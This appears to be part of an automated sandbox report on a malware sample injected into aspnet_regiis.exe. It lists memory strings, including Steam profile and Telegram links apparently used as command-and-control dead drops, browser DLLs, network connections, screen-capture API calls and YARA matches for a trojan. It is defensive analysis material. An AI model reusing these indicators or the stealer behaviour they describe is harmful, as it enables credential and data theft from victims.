                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/market/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997804188699&
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869Y
                      Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869x
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/s
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/workshop/
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/about/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/explore/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/legal/
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/mobile
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/points/shop/
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/stats/
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                      Source: HDGCFH.3.drString found in binary or memory: https://support.mozilla.org
                      Source: HDGCFH.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: HDGCFH.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
                      Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
                      Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                      Source: HDGCFH.3.drString found in binary or memory: https://www.mozilla.org
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                      Source: HDGCFH.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/FBFIEBGHJE
                      Source: HDGCFH.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: aspnet_regiis.exe, 00000003.00000003.1983803798.0000000022283000.00000004.00000020.00020000.00000000.sdmp, HDGCFH.3.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                      Source: HDGCFH.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: aspnet_regiis.exe, 00000003.00000003.1983803798.0000000022283000.00000004.00000020.00020000.00000000.sdmp, HDGCFH.3.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                      Source: aspnet_regiis.exe, 00000003.00000003.1983803798.0000000022283000.00000004.00000020.00020000.00000000.sdmp, HDGCFH.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.9:49712 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A11F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,3_2_02A11F55

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 3.2.aspnet_regiis.exe.2a3f8e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
                      Source: 3.2.aspnet_regiis.exe.2a3dcd8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
                      PE file has nameless sections
                      Source: file.exeStatic PE information: section name:
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D5BA4E0 GetModuleHandleW,NtQueryInformationProcess,0_2_6D5BA4E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02A0145B GetCurrentProcess,NtQueryInformationProcess,3_2_02A0145B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CACB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6CACB700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CACB8C0 rand_s,NtQueryVirtualMemory,3_2_6CACB8C0
